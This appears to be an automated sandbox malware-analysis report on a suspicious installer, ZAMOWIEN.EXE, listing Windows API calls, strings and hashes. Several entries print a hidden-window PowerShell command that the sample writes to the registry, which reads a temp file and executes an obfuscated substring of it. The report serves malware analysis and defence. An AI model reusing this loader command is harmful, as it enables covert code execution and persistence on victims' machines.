                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: 37ed512b4e6a73fa7b218ced66279205dffd3632bf1cde0f8a6bcfd1291ce454
                                                            • Instruction ID: 9ca0b60e261c8965cdba10a2ea8656b5749752178a281bd0d7ed358432df3ed8
                                                            • Opcode Fuzzy Hash: 37ed512b4e6a73fa7b218ced66279205dffd3632bf1cde0f8a6bcfd1291ce454
                                                            • Instruction Fuzzy Hash: 0A014F70540209ABEF249F61DD09EAE37B9AB00304F00803AFA06A92D1D7B9A9518B59
                                                            APIs
                                                            • lstrlenA.KERNEL32(folketingssamlingerne Setup: Completed,folketingssamlingerne Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404592,000000DF,0000040F,00000400,00000000), ref: 00404700
                                                            • wsprintfA.USER32 ref: 00404708
                                                            • SetDlgItemTextA.USER32(?,folketingssamlingerne Setup: Completed), ref: 0040471B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s$folketingssamlingerne Setup: Completed
                                                            • API String ID: 3540041739-385840239
                                                            • Opcode ID: 1576ffd7ebf1549694635f0105f133e1afb09a14e912d6d1f0dbd7142d50ffe3
                                                            • Instruction ID: b9eb64851fedaacd123e4baa5ce65a5686f114beaf7671e7a0f873141027489b
                                                            • Opcode Fuzzy Hash: 1576ffd7ebf1549694635f0105f133e1afb09a14e912d6d1f0dbd7142d50ffe3
                                                            • Instruction Fuzzy Hash: B911087360023437DB00A5699C05EAF325ECBC2334F14463BFA29F61D1E9799C5182E9
                                                            APIs
                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                                            • lstrlenA.KERNEL32(-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)",00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                                            • RegSetValueExA.ADVAPI32(?,?,?,?,-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)",00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                                            • RegCloseKey.ADVAPI32(?,?,?,-windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)",00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                                            Strings
                                                            • -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)", xrefs: 00402369, 00402377, 0040238B, 0040239B, 004023A6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateValuelstrlen
                                                            • String ID: -windowstyle hidden "$Chippies=Get-Content -Raw 'C:\Users\user~1\AppData\Local\Temp\deciliteren\afstnings\Rapses.Arb';$Notaudskrivningsdatoen=$Chippies.SubString(53160,3);.$Notaudskrivningsdatoen($Chippies)"
                                                            • API String ID: 1356686001-4136866560
                                                            • Opcode ID: 0ea8963c8065e0165b89048481963c02c013214db18778ce5d0711c6db80895a
                                                            • Instruction ID: c186b2a4276190d5bc678cf3fdc7432ddc4badc979a32f69cf8a69a4641a35af
                                                            • Opcode Fuzzy Hash: 0ea8963c8065e0165b89048481963c02c013214db18778ce5d0711c6db80895a
                                                            • Instruction Fuzzy Hash: 3E116071E00208BFEB10EFB5CE89EAF7A78EB44358F10403AF905B71D1D6B85D419A69
                                                            APIs
                                                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A68
                                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Close$DeleteEnumOpen
                                                            • String ID:
                                                            • API String ID: 1912718029-0
                                                            • Opcode ID: 6ccabfd9daed6dfd24be4e757130db04132cda2359aedd25e4475ff07f213d8b
                                                            • Instruction ID: eecf360da6df2efa0186febf022189a705215a27ca05cea183c71e0b6ea401ae
                                                            • Opcode Fuzzy Hash: 6ccabfd9daed6dfd24be4e757130db04132cda2359aedd25e4475ff07f213d8b
                                                            • Instruction Fuzzy Hash: C4116D31600108BFDF219F90DE48DAA3B6DEB55348B108036FA06A00A0D7B89E519F69
                                                            APIs
                                                            • GetDlgItem.USER32(?), ref: 00401CD0
                                                            • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                                            • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                                            • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                                            • DeleteObject.GDI32(00000000), ref: 00401D1B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: 52868fd8dd495f4ff794a1b0028cb4a654666ec24bf0ca46eb8d5e1f38cb8031
                                                            • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                                            • Opcode Fuzzy Hash: 52868fd8dd495f4ff794a1b0028cb4a654666ec24bf0ca46eb8d5e1f38cb8031
                                                            • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401D29
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                                            • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID:
                                                            • API String ID: 3808545654-0
                                                            • Opcode ID: 6d7f9ae48aef49e7419ce25ac312adebbc2fb05d2974f7ddd103dfdfafe1979d
                                                            • Instruction ID: 9f5ed10b5bb85ac316f890bfb77d01761dc9091989f44356331de206d73bebcc
                                                            • Opcode Fuzzy Hash: 6d7f9ae48aef49e7419ce25ac312adebbc2fb05d2974f7ddd103dfdfafe1979d
                                                            • Instruction Fuzzy Hash: FC0186B1958341AFE7019BB0AF1ABAF7F74A725705F100439F146B62E2C67C14158B2F
                                                            APIs
                                                            • SetWindowTextA.USER32(00000000,007A1F00), ref: 00403984
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: TextWindow
                                                            • String ID: "C:\Users\user\Desktop\ZAMOWIEN.EXE.exe"$1033$folketingssamlingerne Setup: Completed
                                                            • API String ID: 530164218-3239689819
                                                            • Opcode ID: 011e7586333bb1fa8085740cef34eb3ad1408466ae2e32c4f00044f2748da301
                                                            • Instruction ID: e9ab1962833233591b25b756af0d4d76970a397b62c84286e92f90c0dad54111
                                                            • Opcode Fuzzy Hash: 011e7586333bb1fa8085740cef34eb3ad1408466ae2e32c4f00044f2748da301
                                                            • Instruction Fuzzy Hash: 1111D8B1B046119BC724DF19DC809377BADEB86756318813FE902673A1D67D9D028B68
                                                            APIs
                                                            • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004030D9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 0040562F
                                                            • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004030D9,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3410,004032A1), ref: 00405638
                                                            • lstrcatA.KERNEL32(?,00409014), ref: 00405649
                                                            Strings
                                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405629
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CharPrevlstrcatlstrlen
                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\
                                                            • API String ID: 2659869361-2382934351
                                                            • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                            • Instruction ID: a924f5e5efff63b814f2bb1aba828fa5060afbb52db2a3f4b10526d23ad23d6c
                                                            • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                                            • Instruction Fuzzy Hash: 0FD0A962A059303AD2022A158C05E8F7A1CCF13301B040422F200B62A2CA3C6D418BFE
                                                            APIs
                                                            • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                                            • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                                            • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                                            • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                                              • Part of subcall function 00405ADA: wsprintfA.USER32 ref: 00405AE7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                            • String ID:
                                                            • API String ID: 1404258612-0
                                                            • Opcode ID: 15bbcb46c0304cebef2948dd90507b788932babe692363a3176a18277c5093b4
                                                            • Instruction ID: e997095eb8ac9b39cb2e990ea4d9d7297676044432be4d967855e01db0d67fff
                                                            • Opcode Fuzzy Hash: 15bbcb46c0304cebef2948dd90507b788932babe692363a3176a18277c5093b4
                                                            • Instruction Fuzzy Hash: 80112E71900108BEDB01EFA5DD85DAEBBB9EF04344B20807AF505F61E2D779AE54DB28
                                                            APIs
                                                            • CharNextA.USER32(?,?,C:\,?,0040572E,C:\,C:\,?,?,771B3410,00405479,?,C:\Users\user~1\AppData\Local\Temp\,771B3410,00000000), ref: 004056D0
                                                            • CharNextA.USER32(00000000), ref: 004056D5
                                                            • CharNextA.USER32(00000000), ref: 004056E9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: CharNext
                                                            • String ID: C:\
                                                            • API String ID: 3213498283-3404278061
                                                            • Opcode ID: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                                            • Instruction ID: 5a28b070b40ebc86f9924178211a5f21c719a032cfd05c28209d31321f5df37b
                                                            • Opcode Fuzzy Hash: 594f31a488926a8360d4dc687cc681d5945629fa4112d744ade59810bb8e8aa4
                                                            • Instruction Fuzzy Hash: B4F0F651909F90ABFF3252680C40B7B5B88CB55315F14047BE245772C1C27D48419F9A
                                                            APIs
                                                            • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                                            • GetTickCount.KERNEL32 ref: 00402C00
                                                            • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000780000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.00000000007B1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264547714.00000000007B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                            Similarity
                                                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                            • String ID:
                                                            • API String ID: 2102729457-0
                                                            • Opcode ID: 11c433d574e92544add56911f42870682812084ac0052d1f61e8685336716005
                                                            • Instruction ID: 8678601a89ebf594b1e28a4f8d2629398f35c478b0c465e21920113c9fb71305
                                                            • Opcode Fuzzy Hash: 11c433d574e92544add56911f42870682812084ac0052d1f61e8685336716005
                                                            • Instruction Fuzzy Hash: D4F0D030909620BFC6516F58BD4CE5F7BA4E745B117518467F204A11A5C27CA8828FAD
                                                            APIs
                                                            • IsWindowVisible.USER32(?), ref: 00404E2C
                                                            • CallWindowProcA.USER32(?,?,?,?), ref: 00404E7D
                                                              • Part of subcall function 00403ED8: SendMessageA.USER32(00010432,00000000,00000000,00000000), ref: 00403EEA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1264242602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1264206247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264269420.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1264285806.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
